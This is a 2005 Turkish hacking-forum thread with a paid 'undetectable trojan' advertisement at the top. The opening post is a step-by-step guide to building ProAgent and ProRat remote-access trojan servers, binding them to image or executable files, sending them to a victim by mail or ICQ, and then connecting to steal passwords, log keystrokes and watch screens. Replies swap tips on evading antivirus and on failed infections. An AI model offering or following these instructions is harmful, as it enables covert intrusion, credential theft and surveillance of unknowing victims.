TRojan Downloadları Ve açıkLamaları!(Progentv2.0Puplic Edition,Prorat(resimli anlatım

Mail Hackta işinize yarayacak Trojenlerin kullanılışını bu topicte açıklamaya çalışacam arkadaşlar ProAgent V2.0 Public Edition Download için Burdan (http://www.spyinstructors.com/show.php?name=Products&wiev=ProAgent) Bu serverı sadece hedeflediğiniz bilgisayarda ya da bilgisayarlarda çalıştırmaya dikkat edin. Konu babcan tarafından açılmış, 4052 kişi tarafından görüntülenip, 23 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!

Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.

Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.

Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Yeni Başlayanlar İçin
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: anlatim downloadlari edition proratresimli trojan
Üye Olmadan Yorum Yazmak İçin Tıklayın!
TRojan Downloadları Ve açıkLamaları!(Progentv2.0Puplic Edition,Prorat(resimli anlatım konusundaki toplam yorum: 23, okunma sayısı: 4052.

Eski 03-09-2005, 00:05   #1
babcan
Forum Kalfası

babcan's Avatar

Üye numarası: #5933
Yer: li
Karma etkisi: 7003 babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000
Kullanıcıya AIM yolu ile mesaj gönder
TRojan Downloadları Ve açıkLamaları!(Progentv2.0Puplic Edition,Prorat(resimli anlatım

Mail Hackta işinize yarayacak Trojenlerin kullanılışını bu topicte açıklamaya çalışacam arkadaşlar

ProAgent V2.0 Public Edition Download için Burdan

Bu serverı sadece hedeflediğiniz bilgisayarda ya da bilgisayarlarda çalıştırmaya dikkat edin. Server çalıştırıldığında belirlediğiniz ayarlar doğrultusunda size mailler göndermeye başlayacaktır. Gelen maillerdeki kriptolu bölümü farenizle kopyalayın ve Builder üzerindeki "Decryptor" butonuna tıklayarak açılan yeni pencereye yapıştırın. İşlem sonucunda açılan yeni pencerede farede ki kriptolu veriyi kriptosuz olarak göreceksiniz

ilk Trojenimiz Proagent şimdi kurulumuna yani server i oluşturmaya gelelim ilk önce dosyamızı Adresten Download ediyoruz
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25035

1- Proagent i çalıştırın

2-"Send Menu" bölümünden size gönderilecek olan mailde yer almasını istediğiniz bilgilerin kutularını işaretleyin

3-Daha sonra "Options" bölümünden serverinizin hedef bilgisayarda çalıştırıldığında yapmasını istediğiniz işlemleri belirleyin.

4-"Server Icon" kısmında serverınıza uygun bir simge belirleyin.(Jpeg)

5-Serverınızı bir dosya ile birleştirmek istiyorsanız "Bind with File" ı seçin ve birleştirilecek dosyayı belirleyin

6-Sağ alttaki "Create Server" butonuna tıklayın.

ve serveriniz oluştu demektir
Prorat Download

Prorat Pro Group tarafından yazılmış bi tür remote programıdır. internet ortamında bağlı bir bilgisayarla bağlantı kurmanıza yarar..

Öncelikle rar dosyası içinden çıkan Prorat.exe dosyasını çalıştırın.

Dil seçimi bölümünden istediğiniz dili belirleyebilirsiniz.programın alt kısmında kur butonunu tıklayın öncelikle çıkan menüde Prorat server oluştur seçeneğini seçiniz

ilk başta sağ en üstte bilgi ayarlarına giriyoruz ordan mail icq vs bigilerimizi giriyoruz.. Daha işimiz bitmedi ikinci kademe serveri oluştur demeden once Genel Ayarlara giriyoruz

Burda Server portu şifre ve serveri göndereceğiniz kişiye vermek istediğiniz nick name bölümü vardır server portunu zaten resimden görüyorsunuz...karşıdaki kişi serveri açtıktan sonra ve sizin mailinize bilgisi geldikten sonra onun bilgisayarına bağlanmak için kulanacağınız şifreyi atıyorsunuz ondan sonra nicname (kurbana vermek istediğiniz ismi) kısmını doldurun..

Ondan sonra 3. kademede dosya birleştir bölümünde hangi dosyayla birleştirip göndermek istiyorsanız ki bu tabiki Jpeg/resim dosyası ) olacak onunla birleştiriyorsunuz

4. kademede server simgesi seçiyorsunuz ki buda en doğal olarak jpeg simgesi olacak eğer serveri Jpeg bir dosyayla birleştirmişseniz...

En son olarak sağ alt köşede server oluştur diyoruz...Serverimiz prorat dosyasının içinde kuruluyor..Serveri kesinlikle bilgisayarımızda açmıyoruz..Ve oluşturduğumuz serveri kurbana yolluyoruz...mail yolu ile gondereceğiniz için size tavsiyem serveri zipleyip yollamanızdır..bu sayede rahatça gönderebilirsiniz..

Son bir uyarı olarak bazı mail adreslerine özelikle mynete server bildirisi gelmemektedir..Yahoo ve hotmail tercihiniz olsun kurban bu serveri kendi bilgisayarında açar açmaz size server bildirisi gelecek ve iş size kalmış şifrenizle bilgisayara çivileme dalmada...

Bol şanslar

(Prorat Tan alıntıdır)
bilmeyen ve ögrenmek isteyen ler için sanırım biraz klavye ile bogusacagız

en güzel ve en iyi oldugunu düşündügüm prorat ı anlatıcam zaten mantık hep aynı sadece kalıte farkı var

ilk önce bununla ne yapabilirz onu anlatalım
mail icq şifreleri
pc format
keylog
screenshot
registy ayarları ve daha bır cok sey

pekı kurban a bunu nasıl yedırecegız..
1.icq yoluyla serverı atarsın (pc yi hiç bilmeyenler yer)
2.exejoınerle birlestirir öyle atarsın (dikkatsiz kullanıcı yer)
3.downloader özelligi ile atarsın bunu karsı pc antivürüs ün özelligine göre bazısı yer bazısı yemez
4.mail yolu ıle atabılırsınız (cogu maıl örn.hotmail direkt serverı tanıyıp bloc luyor)

ProRat programımız

ProConnective ag arkasındakı pc lere baglanmak ıcın gereklı

cıkıcak

ilk önce dil secenegını türkce yapın

öncelikle programın en gerekli özelliklerini anlatım

acınca ekranda
ip (karsı pc nın ip sini yazacagımız kısım)

port gerek yok 5110 da kalsın

r kutucugu ProConnective için gereken durumlarda kullanılır

pc bilgisi karsı pc hakkında en gereklı bılgılerı lısteler
uygulama o an calısan uygulamaları lısteler

hata msj geyik bir özellık kullanmayın kıllanmasın viktim

chat karsı pc ıle chat yapmak ıcın önerılmez

d.yonetıcısı karsı pc de ne var ne yok bakabılırsın download ve upload yapabılırsın

keyloger karsı pc klavyede kullandıgı butun tusları gosterır

goruntu al karsı pc ekranda ne gorurse sende gorursun

şifreler karsı pc de kayıtlı butun sifreleri alır

onlıne edıtor server bilgilerini güncellemek için

olustur karsı pc ye gonderıcegmız serverı yapmak ıcın gereklı buton

önce server yapalım

olustura basın acılacak menuden

server olustur a gelın

acılacak munuden degısmesı gerekenler sırası ıle

bilgi ayarlarından ProConnective bildirimini etkınlestıra genelde gerekmeyen ag arkasındakı pc ye gıreceksenız ve
ıp adresınız sureklı aynı ıse kullanabılırsınz
kullanımı
kutuyu işaretle assagıya donuk ok ısaretıne bas

mail bildirimini etkınlestır ben kullanmıyorum ama gerekıse dıye sölüyorum
karsı pc ye attıgınız server pc her acısta bu maıle gereklı bılgıler gonderıcek
ip adresı kurban bılgılerı vs vs

icq pager kesınlıkle gercek ıcq numaranızı yazın

pc her acılısta ıcq nuza bır pager gelıcek ve onlıne olan kurbanın o ankı ıp sını verıcek

cgi bilidirimi kutuyu kaldırın gereksız

ıkıncı bölüm

genel ayarlar

burda degıseceklerı yazıyorum

server sifresi sizden baskası baglanmasın o kurbana dıye degıstırmekde fayda var

ve egerkı tek bır kısıde yogunlasmıcaksanız 192.168. gibi iplerden bildiri gönderılmesın ı ısaretleyın

digerleride keyfı olarak düzenleyin

en altta kı server simgesi

istediginiz simgeyı koyabılırsınız

dosya ıle bırlestır

serverı her hangı bır dosya ıle bırlestırebılırsınız dikkat edecegiiniz
tek sey birlestireceginiz dosya nın uzantısı exe olmalı

server uzantısı cok gereklı degıl exe de kalabılır

en son olustur a basın ve serverınız

prorat dosyasının ıcıne olusturuldu

sakın sız kendınızde acmayın

(egerkı bır sekılde acarsanız prorat programının ana
sayfasında sag yukarda supurge resmı var acın ve ıkı tusada basın
bulunan serverı kaldırır)

bu olusturdugunuz dosyayı bır sekılde karsıya gönderın ve acmasını saglayın

actıkdan sonra ıcq ya bıldırım gelecek orda yazan ıp yı
kopyalayın ve programın ana menudekı ıp yazan yere yapıstırın

baglan deyın

şifre ekranına olustururken gırdıgınız sıfreyı yazın ve olay bıtmıstır

artık o pc her sekılde sızın elınızde ne yapcagınız tamamen sızın ınsıyatıfınızde

egerkı icq pager yada maıl yoluyla ıp gelıyor fakat baglanmıyorsa ıkı sebebı var

1.ag arkasında
2.su an vıctım onlıne degıl

Düzenleyen babcan : 03-09-2005 at 00:10.
babcan Çevrimdışı   Alıntı Yaparak Cevapla

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 03-09-2005, 00:13   #2
LiEqB
Banned

LiEqB's Avatar

Üye numarası: #26945
Yer: [216.32.89.142]
Karma etkisi: 0 LiEqB seviye: 650LiEqB seviye: 650LiEqB seviye: 650LiEqB seviye: 650LiEqB seviye: 650LiEqB seviye: 650

da bu meret antivirüslere takılıyor
LiEqB Çevrimdışı   Alıntı Yaparak Cevapla

Eski 03-09-2005, 00:16   #3
Teğmen
Banned

Teğmen's Avatar

Üye numarası: #8391
Yer: SaMSuN
Karma etkisi: 0 Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000
Kullanıcıya MSN yolu ile mesaj gönder

Alıntı:
Orjinal Mesaj Sahibi ***LiE_qB***
da bu meret antivirüslere takılıyor

kesinlikle katılıyorum takılıyo EMEĞE SAYGI paylaştığın için sağol
Teğmen Çevrimdışı   Alıntı Yaparak Cevapla

Eski 03-09-2005, 22:24   #4
tontong
Banned

tontong's Avatar

Üye numarası: #16461
Yer: c:/windows/system32
Karma etkisi: 0 tontong seviye: 0

anti lere yakalanmasın diye ayrıetten ayarlar yapılabiliyor
tontong Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 00:55   #5
Teğmen
Banned

Teğmen's Avatar

Üye numarası: #8391
Yer: SaMSuN
Karma etkisi: 0 Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000Teğmen seviye: 1000

anlatta bizde bilelim
Teğmen Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 02:00   #6
LycaN343
Çırak

Üye numarası: #34742
Karma etkisi: 0 LycaN343 seviye: 10

Peki nasıl IP ögrenebilirim hocam?
LycaN343 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 15:29   #7
LycaN343
Çırak

Bide şeyi merak ettim orda ip bölümüne kendi kimizi mi yazacaz?

Eski 04-09-2005, 15:57   #8
LycaN343
Çırak

ProRatı birine soktum ancak ip si gelmedi mail e sadece ProRat v1.9 Client Test Message geldi.ICQ olmadıgındanmı?

Eski 04-09-2005, 16:01   #9
xxfiles
Banned

xxfiles's Avatar

Üye numarası: #28607
Yer: Nirvana
Karma etkisi: 0 xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000xxfiles seviye: 2000

Proratı keşke anlatmasaydın çok sıktı artık.Hem bütün antivirüsler tanıyo onu
xxfiles Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 16:07   #10
babcan
Forum Kalfası

babcan's Avatar

Üye numarası: #5933
Yer: li
Karma etkisi: 7003 babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000babcan seviye: 2000
Kullanıcıya AIM yolu ile mesaj gönder

bazen firewallerden geçebiliyor %50 ihtimal denemeye değer!
babcan Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 20:47   #11
chan
Çırak

Üye numarası: #33664
Karma etkisi: 0 chan seviye: 10

kardeş güzel bişey emekde vermişsin öle görünüyor..
ama bişi anladıysam namertim..
chan Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 23:00   #12
kempes89
Cool Çırak

kempes89's Avatar

Üye numarası: #1668
Karma etkisi: 0 kempes89 seviye: 10

eyvallah pek bişi anlamıyodum ama yazından anladım bişiler =)
çok saol kardeş
kempes89 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 04-09-2005, 23:05   #13
kempes89
Cool Çırak

kempes89's Avatar

Üye numarası: #1668
Karma etkisi: 0 kempes89 seviye: 10

ama bişi sorcam ProAgent V2.0 Public Edition Download için Burdan demişsin burdan hangisini indircez yahu ? =)
kempes89 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 16-11-2005, 17:31   #14
ufukevcimen
Çırak

Üye numarası: #30978
Karma etkisi: 0 ufukevcimen seviye: 10

ya kardeş aline sağlık ta bak bunu ben başka yerdede okudum ve hep aynısı ağ arkasındaki bilgisayarlara bir çözüm bulunamadı.bilen birisi anlatsın bilmiyorsanız hiç uğraşmayalım yada başka bir çözüm yolu üretelim.çünkü işe yaramıyor prorat ile sadece ben kendi ağımdaki bilgisayara bağlanabildim diğer hiç bir bilgisayara bağlanamıyorum mail adresime ip lerde geliyor online olduğundanda eminim ama pc ye giremiyorum neden .sözüm bilen kişilere burası paylaşım sitesi bilgilerimiz paylaştıkça çoğalır.hadi arkadaşlar.bi yardımcı olun.isteyen msn den ulaşabilir ufukevcimen@hotmail.comsaygılar
ufukevcimen Çevrimdışı   Alıntı Yaparak Cevapla

Eski 28-11-2005, 08:51   #15
Hetruckz
Çırak

Üye numarası: #685
Karma etkisi: 0 Hetruckz seviye: 10

Selam Ya Çok Acele Öğrenmem gereken bir soru var çünkü bir anda bütün programlar gittib bende yani çalışmıyor ya bu mesela Prorat'ı kullanmak için C++ yüklü olmasımı lazım ? bilgisayar proratı açmaya çalışınca '' ! Cannot execute "C:\DOCUME~1\KULLAN~1\LOCALS~1\Temp\Rar$EX00.652\P roRat.exe" '' diye bir hata veriyor bunu nasıl çözebilirim bilen varmı ayrıca icereload diye bir program vardı onuda denedim aynı hatayı verdi lütfen yardım edin ben basic bir öğrenciyim hehehhe kendinize iyi bakın güze insanlar
Hetruckz Çevrimdışı   Alıntı Yaparak Cevapla

Üye Olmadan Yorum Yazmak İçin Tıklayın!
Konudaki toplam yorum: 23, okunma sayısı: 4052.

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)

Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Gönderme Kuralları